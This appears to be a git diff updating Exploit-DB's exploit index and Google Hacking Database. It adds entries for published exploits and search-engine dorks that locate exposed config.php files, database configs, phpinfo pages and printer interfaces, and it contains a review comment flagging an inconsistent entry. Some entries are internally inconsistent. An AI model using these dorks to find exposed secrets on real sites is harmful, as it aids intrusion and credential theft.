 49801,exploits/hardware/webapps/49801.html,"Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF)",2021-04-23,LiquidWorm,webapps,hardware,,2021-04-23,2021-04-23,0,,,,,,
@@ -9099,6 +9109,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 45107,exploits/macos/local/45107.txt,"Charles Proxy 4.2 - Local Privilege Escalation",2018-07-30,"Mark Wadham",local,macos,,2018-07-30,2018-07-30,0,CVE-2017-15358,Local,,,,https://m4.rkw.io/blog/cve201715358-local-root-privesc-in-charles-proxy-42.html
 46724,exploits/macos/local/46724.txt,"Evernote 7.9 - Code Execution via Path Traversal",2019-04-18,"Dhiraj Mishra",local,macos,,2019-04-18,2019-04-18,0,CVE-2019-10038,Traversal,,,,https://www.inputzero.io/2019/04/evernote-cve-2019-10038.html
 50696,exploits/macos/local/50696.py,"Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)",2022-02-02,LiquidWorm,local,macos,,2022-02-02,2022-02-02,0,,,,,,
+51361,exploits/macos/local/51361.txt,"Google Chrome Browser 111.0.5563.64 - AXPlatformNodeCocoa Fatal OOM/Crash (macOS)",2023-04-14,LiquidWorm,local,macos,,2023-04-14,2023-04-14,0,,,,,,
 44307,exploits/macos/local/44307.m,"Google Software Updater macOS - Unsafe use of Distributed Objects Privilege Escalation",2018-03-20,"Google Security Research",local,macos,,2018-03-20,2018-03-20,1,CVE-2018-6084,Local,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1486
 43224,exploits/macos/local/43224.sh,"Hashicorp vagrant-vmware-fusion 4.0.23 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,,2017-12-06,2017-12-06,1,CVE-2017-11741,Local,,,,https://m4.rkw.io/blog/cve201711741-local-root-privesc-in-hashicorp-vagrantvmwarefusion--4023.html
 43223,exploits/macos/local/43223.sh,"Hashicorp vagrant-vmware-fusion 4.0.24 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,,2017-12-06,2017-12-06,1,CVE-2017-12579,Local,,,,https://m4.rkw.io/blog/cve201712579-local-root-privesc-in-hashicorp-vagrantvmwarefusion-4024.html
@@ -14836,6 +14847,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48568,exploits/php/webapps/48568.py,"Bludit 3.9.12 - Directory Traversal",2020-06-09,"Luis Vacacas",webapps,php,,2020-06-09,2020-06-09,0,CVE-2019-16113,,,,,
 48942,exploits/php/webapps/48942.py,"Bludit 3.9.2 - Auth Bruteforce Bypass",2020-10-23,"Mayank Deshmukh",webapps,php,,2020-10-23,2020-11-13,1,CVE-2019-17240,,,,,
 49037,exploits/php/webapps/49037.rb,"Bludit 3.9.2 - Authentication Bruteforce Bypass (Metasploit)",2020-11-13,Aporlorxl23,webapps,php,,2020-11-13,2020-11-13,1,,,,,,
+51360,exploits/php/webapps/51360.txt,"Bludit 4.0.0-rc-2 - Account takeover",2023-04-14,nu11secur1ty,webapps,php,,2023-04-14,2023-04-14,0,,,,,,
 46060,exploits/php/webapps/46060.txt,"bludit Pages Editor 3.0.0 - Arbitrary File Upload",2018-12-27,BouSalman,webapps,php,80,2018-12-27,2019-01-02,0,CVE-2018-1000811,,,,http://www.exploit-db.combludit-3.0.0.zip,
 11360,exploits/php/webapps/11360.txt,"Blue Dove - SQL Injection",2010-02-08,HackXBack,webapps,php,,2010-02-07,,0,,,,,,
 7797,exploits/php/webapps/7797.php,"Blue Eye CMS 1.0.0 - 'clanek' Blind SQL Injection",2009-01-15,darkjoker,webapps,php,,2009-01-14,2017-01-17,1,OSVDB-51769;CVE-2009-0425,,,,,
@@ -37231,7 +37243,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 42997,exploits/windows/dos/42997.txt,"Microsoft Windows 10 - WLDP/MSHTML CLSID UMCI Bypass",2017-10-17,"Google Security Research",dos,windows,,2017-10-17,2017-10-17,1,CVE-2017-11823,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1328
 47797,exploits/windows/dos/47797.c,"Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)",2019-12-20,vportal,dos,windows,,2019-12-20,2019-12-20,0,,,,,,
 42007,exploits/windows/dos/42007.cpp,"Microsoft Windows 10 Kernel - 'nt!NtTraceControl (EtwpSetProviderTraits)' Pool Memory Disclosure",2017-05-15,"Google Security Research",dos,windows,,2017-05-15,2017-05-15,1,CVE-2017-0259,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1161
-51348,exploits/windows/dos/51348.txt,"Microsoft Windows 11 - 'cmd.exe' Denial of Service",2023-04-08,"Milad karimi",dos,windows,,2023-04-08,2023-04-08,0,,,,,,
 20437,exploits/windows/dos/20437.c,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (1)",1997-07-05,_eci,dos,windows,,1997-07-05,2012-08-11,1,"CVE-1999-0153 ;OSVDB-1666",,,,,https://www.securityfocus.com/bid/2010/info
 20438,exploits/windows/dos/20438.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (2)",1997-05-07,_eci,dos,windows,,1997-05-07,2012-08-11,1,CVE-1999-0153;OSVDB-1666,,,,,https://www.securityfocus.com/bid/2010/info
 20439,exploits/windows/dos/20439.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (3)",1997-05-07,_eci,dos,windows,,1997-05-07,2012-08-11,1,CVE-1999-0153;OSVDB-1666,,,,,https://www.securityfocus.com/bid/2010/info
diff --git a/ghdb.xml b/ghdb.xml
index b68150a2d..df6ccf7b6 100644
--- a/ghdb.xml
+++ b/ghdb.xml
@@ -37156,6 +37156,22 @@ Google+ https://plus.google.com/u/0/114827336297709201563 2021-10-18 Roshdy Essam + + 8153 + https://www.exploit-db.com/ghdb/8153 + Files Containing Juicy Info + Google Dork: intitle:"index of" "properties.json" + # Google Dork: intitle:"index of" "properties.json" +# Files Containing Juicy Info +# Date: 13/04/2023 +# Exploit Author: Arnob Biswas + + intitle:"index of" "properties.json" + https://www.google.com/search?q=intitle:"index of" "properties.json" + + 2023-04-14 + Arnob Biswas + 7303 https://www.exploit-db.com/ghdb/7303 @@ -40429,6 +40445,21 @@ Category: Files Containing Juicy Info 2022-09-19 HackerFrenzy + + 8155 + https://www.exploit-db.com/ghdb/8155 + Files Containing Juicy Info + intitle:"index of " "config/db" + # Google Dork: intitle:"index of" "properties.json" +# Files Containing Juicy Info +# Date: 13/04/2023 +# Exploit Author: Jerr279 + intitle:"index of " "config/db" + https://www.google.com/search?q=intitle:"index of " "config/db" + + 2023-04-14 + Jerr279 + 8132 https://www.exploit-db.com/ghdb/8132 @@ -42654,6 +42685,21 @@ DORK: intitle:"index of" "config.js" 2021-10-04 Suman Das + + 8154 + https://www.exploit-db.com/ghdb/8154 + Files Containing Juicy Info + intitle:"index of" "config.php" + # Google Dork: intitle:"index of" "config.php" +# Files Containing Juicy Info +# Date: 13/04/2023 +# Exploit Author: Jerr279 + intitle:"index of" "config.php" + https://www.google.com/search?q=intitle:"index of" "config.php" + + 2023-04-14 + Jerr279 + 6048 https://www.exploit-db.com/ghdb/6048 
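Review bot: Entry 8155 is internally inconsistent: its query is `intitle:"index of " "config/db"` while its textual description header reads `# Google Dork: intitle:"index of" "properties.json"`, which is the header of entry 8153 in the hunk above and appears to have been pasted over. The stray space inside `"index of "` in the 8155 query and search URL also differs from the `"index of"` phrase used by every neighbouring entry (8153, 8154), so it is likely a typo that changes the matched phrase; both the description and the phrase should be corrected before the entry is indexed. The same description/query consistency check would have caught this at submission time for the other entries in this file section.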
@@ -49102,6 +49148,21 @@ Dxtroyer 2017-04-06 anonymous + + 8156 + https://www.exploit-db.com/ghdb/8156 + Files Containing Juicy Info + inurl:"/private" intext:"index of /" "config" + # Google Dork: inurl:"/private" intext:"index of /" "config" +# Files Containing Juicy Info +# Date: 13/04/2023 +# Exploit Author: Jerr279 + inurl:"/private" intext:"index of /" "config" + https://www.google.com/search?q=inurl:"/private" intext:"index of /" "config" + + 2023-04-14 + Jerr279 + 8152 https://www.exploit-db.com/ghdb/8152 @@ -52034,6 +52095,21 @@ Thanks & Regards 2021-01-07 Rushabh Doshi + + 8157 + https://www.exploit-db.com/ghdb/8157 + Files Containing Juicy Info + inurl:info.php intext:"PHP Version" intitle:"phpinfo()" + # Google Dork: inurl:info.php intext:"PHP Version" intitle:"phpinfo()" +# Files containing juicy info. +# Date: 13/04/2023 +# Exploit Author: Vitor Guaxi + inurl:info.php intext:"PHP Version" intitle:"phpinfo()" + https://www.google.com/search?q=inurl:info.php intext:"PHP Version" intitle:"phpinfo()" + + 2023-04-14 + Vitor guaxi + 4389 https://www.exploit-db.com/ghdb/4389 @@ -105922,6 +105998,21 @@ temperature, etc) can be found. 2006-10-02 anonymous + + 8158 + https://www.exploit-db.com/ghdb/8158 + Various Online Devices + intitle:Web Image Monitor inurl:mainFrame.cgi + # Google Dork: intitle:Web Image Monitor inurl:mainFrame.cgi +# Various Online Devices +# Date:14/04/2023 +# Exploit Author: Hasan Ali YILDIR + Google Dork: Recoh Printer Properties Page + https://www.google.com/search?q=Google Dork: Recoh Printer Properties Page + + 2023-04-14 + Hasan Ali YILDIR + 4200 https://www.exploit-db.com/ghdb/4200